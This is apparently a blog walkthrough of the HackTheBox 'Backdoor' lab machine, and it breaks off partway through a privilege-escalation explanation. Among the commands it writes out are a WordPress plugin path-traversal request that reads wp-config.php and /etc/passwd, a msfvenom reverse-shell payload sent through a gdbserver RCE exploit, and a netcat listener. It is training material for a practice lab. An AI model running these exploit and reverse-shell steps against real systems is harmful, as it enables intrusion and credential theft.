HTB Backdoor Walkthrough

Andy From Italy is back with another solid HackTheBox technical write up, this time he heads for the BACKDOOR.

HTB Backdoor Walkthrough
Image by Mr Misang

Hello my friends, it is me Andy From Italy again! I am back with a simple and interesting BOX with an intriguing "command & control" that wasn't entirely clear and  required a separate investigation. Let's begin!

The nmap scan:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-21 21:21 CET
Nmap scan report for 10.10.11.125
Host is up (0.051s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.60 seconds

Only two doors open: 22 and 80. Obviously for now we will leave out port 22 on ssh and start investigating the portal.

It is immediately clear that we are dealing with a wordpress portal, so let's try to scan with the wpscan tool.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.11.125 - Backdoor (lin)]
└─$ wpscan -e --url http://10.10.11.125                                                                           
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Tue Dec 21 21:29:01 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.11.125/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |  - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
 | Latest Version: 2.8 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:03 <===================================> (358 / 358) 100.00% Time: 00:00:03
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:27 <=================================> (2575 / 2575) 100.00% Time: 00:00:27

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <====================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <==========================================> (71 / 71) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:01 <===============================> (100 / 100) 100.00% Time: 00:00:01

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=====================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Dec 21 21:29:49 2021
[+] Requests Done: 3311
[+] Cached Requests: 8
[+] Data Sent: 914.804 KB
[+] Data Received: 18.359 MB
[+] Memory used: 231.812 MB
[+] Elapsed time: 00:00:48

One of the first things I notice is that the portal is using a template called "twentyseventeen", so let's look for some specific exploit. I find some interesting links, but nothing that can be useful. Go on. The scan identified the admin user, which can be retrieved through the link http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1, but the most important information is missed: credentials.

[{"id":1,"name":"admin","url":"http:\/\/backdoor.htb","description":"","link":"http:\/\/10.10.11.125\/index.php\/author\/admin\/","slug":"admin","avatar_urls":{"24":"http:\/\/2.gravatar.com\/avatar\/2cfab1d357956161ae033fe8c3605541?s=24&d=mm&r=g","48":"http:\/\/2.gravatar.com\/avatar\/2cfab1d357956161ae033fe8c3605541?s=48&d=mm&r=g","96":"http:\/\/2.gravatar.com\/avatar\/2cfab1d357956161ae033fe8c3605541?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/10.10.11.125\/index.php\/wp-json\/wp\/v2\/users\/1"}],"collection":[{"href":"http:\/\/10.10.11.125\/index.php\/wp-json\/wp\/v2\/users"}]}}]

I still have a user, let's see if some simple brute-force can give me the complete credentials; The metasploit framework should have some interesting scripts.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ msfconsole                                                                                    
[...]
msf6 > search wordpress brute

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  auxiliary/scanner/http/wordpress_login_enum                        normal     No     WordPress Brute Force and User Enumeration Utility
   1  exploit/unix/webapp/wp_total_cache_exec           2013-04-17       excellent  Yes    WordPress W3 Total Cache PHP Code Execution
   2  auxiliary/gather/wp_w3_total_cache_hash_extract                    normal     No     WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract
   3  auxiliary/scanner/http/wordpress_multicall_creds                   normal     No     Wordpress XML-RPC system.multicall Credential Collector


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/http/wordpress_multicall_creds                                                                                                            

msf6 > use 0
msf6 auxiliary(scanner/http/wordpress_login_enum) > options 

Module options (auxiliary/scanner/http/wordpress_login_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BLANK_PASSWORDS      false            no        Try blank passwords for all users
   BRUTEFORCE           true             yes       Perform brute force authentication
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false            no        Add all passwords in the current database to the list
   DB_ALL_USERS         false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING     none             no        Skip existing credentials stored in the current database (Acce
                                                   pted: none, user, user&realm)
   ENUMERATE_USERNAMES  true             yes       Enumerate usernames
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RANGE_END            10               no        Last user id to enumerate
   RANGE_START          1                no        First user id to enumerate
   RHOSTS                                yes       The target host(s), see https://github.com/rapid7/metasploit-f
                                                   ramework/wiki/Using-Metasploit
   RPORT                80               yes       The target port (TCP)
   SSL                  false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   TARGETURI            /                yes       The base path to the wordpress application
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME                              no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pa
                                                   ir per line
   USER_AS_PASS         false            no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   VALIDATE_USERS       true             yes       Validate usernames
   VERBOSE              true             yes       Whether to print output for all attempts
   VHOST                                 no        HTTP server virtual host

msf6 auxiliary(scanner/http/wordpress_login_enum) > set blank_passwords true
blank_passwords => true
msf6 auxiliary(scanner/http/wordpress_login_enum) > set enumerate_usernames false
enumerate_usernames => false
msf6 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /usr/share/wordlists/rockyou.txt
pass_file => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/http/wordpress_login_enum) > set rhosts backdoor.htb
rhosts => backdoor.htb
msf6 auxiliary(scanner/http/wordpress_login_enum) > set username admin
username => admin
msf6 auxiliary(scanner/http/wordpress_login_enum) > set user_as_pass true
user_as_pass => true
msf6 auxiliary(scanner/http/wordpress_login_enum) > exploit

[*] / - WordPress Version 5.8.1 detected
[*] 10.10.11.125:80 - / - WordPress User-Validation - Running User Validation
[*] 10.10.11.125:80 - Pair list is still building with 14030131 pairs left to process
[*] 10.10.11.125:80 - Pair list is still building with 13707297 pairs left to process
[*] 10.10.11.125:80 - Pair list is still building with 13379795 pairs left to process
[*] 10.10.11.125:80 - Pair list is still building with 13050320 pairs left to process
[*] 10.10.11.125:80 - Pair list is still building with 12719337 pairs left to process
[...]

It doesn't seem to be the right day. Let's try to look for the usual hidden routings.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ dirb http://backdoor.htb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Dec 21 22:18:28 2021
URL_BASE: http://backdoor.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://backdoor.htb/ ----
+ http://backdoor.htb/index.php (CODE:301|SIZE:0)                                                                 
+ http://backdoor.htb/server-status (CODE:403|SIZE:277)                                                           
==> DIRECTORY: http://backdoor.htb/wp-admin/                                                                      
==> DIRECTORY: http://backdoor.htb/wp-content/                                                                    
==> DIRECTORY: http://backdoor.htb/wp-includes/                                                                   
+ http://backdoor.htb/xmlrpc.php (CODE:405|SIZE:42)                                                               
                                                                                                                  
---- Entering directory: http://backdoor.htb/wp-admin/ ----
+ http://backdoor.htb/wp-admin/admin.php (CODE:302|SIZE:0)                                                        
==> DIRECTORY: http://backdoor.htb/wp-admin/css/                                                                  
==> DIRECTORY: http://backdoor.htb/wp-admin/images/                                                               
==> DIRECTORY: http://backdoor.htb/wp-admin/includes/                                                             
+ http://backdoor.htb/wp-admin/index.php (CODE:302|SIZE:0)                                                        
==> DIRECTORY: http://backdoor.htb/wp-admin/js/                                                                   
==> DIRECTORY: http://backdoor.htb/wp-admin/maint/                                                                
==> DIRECTORY: http://backdoor.htb/wp-admin/network/                                                              
==> DIRECTORY: http://backdoor.htb/wp-admin/user/                                                                 
                                                                                                                  
---- Entering directory: http://backdoor.htb/wp-content/ ----
+ http://backdoor.htb/wp-content/index.php (CODE:200|SIZE:0)                                                      
==> DIRECTORY: http://backdoor.htb/wp-content/plugins/                                                            
==> DIRECTORY: http://backdoor.htb/wp-content/themes/                                                             
==> DIRECTORY: http://backdoor.htb/wp-content/upgrade/                                                            
==> DIRECTORY: http://backdoor.htb/wp-content/uploads/                                                            
                                                                                                                  
[...]
                                                                               
-----------------
END_TIME: Tue Dec 21 22:41:01 2021
DOWNLOADED: 27672 - FOUND: 11

Much better, I find a certificate inside the includes folder, a repair.php script (probably for the database, it's quite common for wordpress databases to need fixing every now and then), the plug-in folder where is contained the "ebook-download" add-on, the version of which is shown in the relative readme file (version 1.1).

The exploit-db portal immediately enlightens us about possible vulnerabilities of this plug-in.

WordPress Plugin eBook Download 1.1 - Directory Traversal
WordPress Plugin eBook Download 1.1 - Directory Traversal.. webapps exploit for PHP platform

Let's try. Obviously, I previously saved the backdoor.htb domain in my /etc/hosts file. I then try to retrieve the wp-config.php file as suggested in the exploit, to verify that the vulnerability has not been fixed.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.125 - Backdoor (lin)/attack/wp]
└─$ wget http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php -O wp-conf.php
--2021-12-21 23:02:31--  http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
Resolving backdoor.htb (backdoor.htb)... 10.10.11.125
Connecting to backdoor.htb (backdoor.htb)|10.10.11.125|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3866 (3.8K) [application/octet-stream]
Saving to: ‘wp-conf.php’

wp-conf.php                  100%[=============================================>]   3.78K  --.-KB/s    in 0.005s  

2021-12-21 23:02:31 (796 KB/s) - ‘wp-conf.php’ saved [3866/3866]

Not only does it work, but I also recover the credentials to access the DB.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.125 - Backdoor (lin)/attack/wp]
└─$ cat wp-conf.php                                                                   
../../../wp-config.php../../../wp-config.php../../../wp-config.php<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
[...]
/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
[...]

Unfortunately the password does not work for the admin user of the portal, so I try to retrieve the list of machine's users through the file /etc/passwd.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.125 - Backdoor (lin)/attack/wp]
└─$ cat passwd     
../../../../../../etc/passwd../../../../../../etc/passwd../../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[...]
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
[...]

It seems that the only user authorized to use a shell is the user "user" (what a fantasy!).

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.125 - Backdoor (lin)/attack/wp]
└─$ ssh user@10.10.11.125            
The authenticity of host '10.10.11.125 (10.10.11.125)' can't be established.
ECDSA key fingerprint is SHA256:iP5gKZmGCL3btYjGjjl2DeNzEcQxW+yooqbQVFN4XuU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.125' (ECDSA) to the list of known hosts.
user@10.10.11.125's password: 
Permission denied, please try again.

But the connection via ssh also fails. I was stuck for quite a while at this point until a peek in the forum enlightened me (I should have thought about it, it wasn't that complicated).

If you only see two TCP ports open, you should perform another port scanning session a little later.

Ok, let's try to scan all ports (nmap by default checks the first 1000 most used ports).

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.125 - Backdoor (lin)/attack/wp]
└─$ nmap -A -T4 -p- 10.10.11.125                                                                               1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-25 22:30 CET
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up (0.048s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor &#8211; Real-Life
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.65 seconds

Excellent, there is also the port 1337 open, too bad we have not found any documentation about it. Being such a generic port, it could be any software, even something custom. I should check which process is running on that port, but I don't have a shell yet and all the commands I know (ps, ss, lsof, etc ...) need to be executed. I know of another way to do it too, but more ... manually (probably the same one used by one of the commands mentioned above). On a Linux machine, all running processes have information saved in the "proc" folder (processes, in fact). Each process, within this folder, has its own folder identified by the process number (PID, the one visible when the ps command is executed). Within that folder, a series of files provide information about the execution and processing of that process. Among these files is the "cmdline" file which contains the command line executed to start the process. If I'm lucky enough, the port used by the service may have been specified in the command, so I have to "grep" those files (too bad I don't have a shell yet). I can't do a "grep", but I can access "cmdline" files located in those folders, through some sort of brute force. Using the plug-in exploit, I simply scroll through all the numbers from scratch, until I find the one that contains a "cmdline" file that also contains the number 1337 (I know this may sound like crazy, useless and pompous work, but at the moment it's the only thing I can think of ... and anyway ... it sounds funny, let's try). Let's prepare a little script and wait for the result.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.125 - Backdoor (lin)/attack/wp]
└─$ i=0; MYVAR=""; while [[ $MYVAR != *"1337"* ]]; do MYVAR=$(curl -s http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline); ((i=i+1)); done; echo $i
854

Incredible, I almost didn't want to believe it, it seems to have worked, we hope. Given the script, the correct process number is not 854, but 853 (the counter increment is at the end of the loop).

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.125 - Backdoor (lin)/attack/wp]
└─$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/853/cmdline --output -  23 ⨯
/proc/853/cmdline/proc/853/cmdline/proc/853/cmdline/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done<script>window.close()</script> 

The process running on port 1337 appears to be the gdbserver; let's see if there is any specific exploit.

GNU gdbserver 9.2 - Remote Command Execution (RCE)
GNU gdbserver 9.2 - Remote Command Execution (RCE).. remote exploit for Linux platform

Let's download the repository and see how it works.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.125 - Backdoor (lin)/attack/gdb]
└─$ python3 50539                                                                               

Usage: python3 50539 <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim's gdbserver   ->  10.10.10.200:1337
- Attacker's listener  ->  10.10.10.100:4444

1. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin

2. Listen with Netcat:
$ nc -nlvp 4444

3. Run the exploit:
$ python3 50539 10.10.10.200:1337 rev.bin

I love when a programmer is so clear and precise in explaining how his code works.

We start a listener on our machine and exploit the victim.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.125 - Backdoor (lin)/attack/gdb]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.172 LPORT=4444 PrependFork=true -o rev.bin          1 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 106 bytes
Saved as: rev.bin
                                                                                                                   
┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.125 - Backdoor (lin)/attack/gdb]
└─$ python3 50539 10.10.11.125:1337 rev.bin
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener

Cabooooom baby... first flag recovered.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.172] from (UNKNOWN) [10.10.11.125] 44806
whoami
user
pwd
/home/user
ls -la
total 36
drwxr-xr-x 6 user user 4096 Nov 10 14:18 .
drwxr-xr-x 3 root root 4096 Nov 10 14:18 ..
lrwxrwxrwx 1 root root    9 Jul 18 21:43 .bash_history -> /dev/null
-rw-r--r-- 1 user user 3771 Feb 25  2020 .bashrc
drwx------ 2 user user 4096 Nov 10 14:18 .cache
drwx------ 3 user user 4096 Nov 10 14:18 .config
drwx------ 4 user user 4096 Nov 10 14:18 .gnupg
drwxrwxr-x 3 user user 4096 Nov 10 14:18 .local
-rw-r--r-- 1 user user  807 Feb 25  2020 .profile
-rw-r----- 1 root user   33 Dec 26 09:42 user.txt
cat user.txt
f******************************4

Ok, from now on, to make your life easier, you can activate the ssh connection on the user "user". Create a new key-pair (ssh-keygen) on your machine, then create the .ssh folder in the folder of the user "user" (this pun is unacceptable), and create a file inside it called "authorization_keys" by inserting it your public key. At this point you can connect via ssh using the command ssh -i id_rsa user@10.10.11.125.

Despite the convenience of ssh, I noticed that after about ten minutes, I was disconnected and the service on port 1337 stopped working, then I preferred to proceed by spawning a tty shell on the original netcat.

Well, let's proceed with a linpeas session. Below is an extraction of the output, as usual, the one I worked on.

[...]
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                        
strings Not Found                                                                                                  
-rwsr-xr-- 1 root messagebus 51K Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper                          
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 23K May 26  2021 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 463K Jul 23 12:55 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 67K Jul 14 22:08 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SP
ARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                          
-rwsr-xr-x 1 root root 84K Jul 14 22:08 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 87K Jul 14 22:08 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 67K Jul 21  2020 /usr/bin/su
-rwsr-xr-x 1 root root 163K Jan 19  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 44K Jul 14 22:08 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 464K Feb 23  2021 /usr/bin/screen  --->  GNU_Screen_4.5.0
-rwsr-xr-x 1 root root 39K Jul 21  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 55K Jul 21  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except
_xnu-1699.24.8                                                                                                     
-rwsr-xr-x 1 root root 52K Jul 14 22:08 /usr/bin/chsh
-rwsr-xr-x 1 root root 31K May 26  2021 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE
-2011-1485)                                                                                                        

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                        
-rwxr-sr-x 1 root utmp 15K Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter                                
-rwxr-sr-x 1 root tty 15K Mar 30  2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 31K Jul 14 22:08 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 343K Jul 23 12:55 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 35K Jul 21  2020 /usr/bin/wall
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root crontab 43K Feb 13  2020 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 83K Jul 14 22:08 /usr/bin/chage
-rwxr-sr-x 1 root shadow 43K Sep 17 06:14 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Sep 17 06:14 /usr/sbin/pam_extrausers_chkpwd
[...]

Specifically, I focused on the SUID and SGID section. However, I notice some CVEs that the linpeas suggests, so I opt to move on these and on all those it has identified. I then extract all the CVEs contained in the output.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.125 - Backdoor (lin)/attack/ws]
└─$ grep -i CVE lpout.txt              
[+] [CVE-2021-3156] sudo Baron Samedit
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 31K May 26  2021 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)

All the exploits I can find, however, do not seem to work, here are the links of some of them.

CVE-2002-1614

Tru64 UNIX 4.0g - ‘/usr/bin/at’ Local Privilege Escalation
Tru64 UNIX 4.0g - ‘/usr/bin/at’ Local Privilege Escalation. CVE-18200CVE-2002-1614 . local exploit for Tru64 platform

CVE-2019-13272

NVD - cve-2019-13272
Build software better, together
GitHub is where people build software. More than 73 million people use GitHub to discover, fork, and contribute to over 200 million projects.

CVE-2011-1485

pkexec - Race Condition Privilege Escalation
pkexec - Race Condition Privilege Escalation. CVE-2011-1485CVE-72261 . local exploit for Linux platform
Unix-Privilege-Escalation-Exploits-Pack/CVE-2011-1485.sh at master · Kabot/Unix-Privilege-Escalation-Exploits-Pack
Exploits for getting local root on Linux, BSD, AIX, HP-UX, Solaris, RHEL, SUSE etc. - Unix-Privilege-Escalation-Exploits-Pack/CVE-2011-1485.sh at master · Kabot/Unix-Privilege-Escalation-Exploits-Pack

I save you the time wasted by running after all the SUIDs and SGIDs listed, but I assure you that I have spent a lot of time trying to figure out how to exploit the flaw. In the end, what returned me a result was the SUID on the "screen" command (also if, in a way, unexpectedly).

screen | GTFOBins
GNU Screen 4.5.0 - Local Privilege Escalation
GNU Screen 4.5.0 - Local Privilege Escalation.. local exploit for Linux platform

This two specific exploits doesn't work for me, so I decide to read up on it better. I try to explain you with a simple outline and a specific example.

First of all, I activate the SUID (chmod u+s) on the file screen that I have locally and list the options for using the command.

At this point we begin to start the various commands in sequence to understand how it works. First, the "screen" command is what is called a "terminal multiplexer"; in a nutshell it creates separate shell sessions in which to run your own commands. The example uses two different sessions, one of the in7rud3r user and the other of the root user.

  1. Initially there are no sessions
  2. I activate a session with the root user and then detach (CTRL + A, D) from it (leaving it hanging)
  3. Obviously the session is visible to the user who started it, but not to another user.
  4. It is however possible to view another user's sessions through the -x argument followed by the user and a final "/"
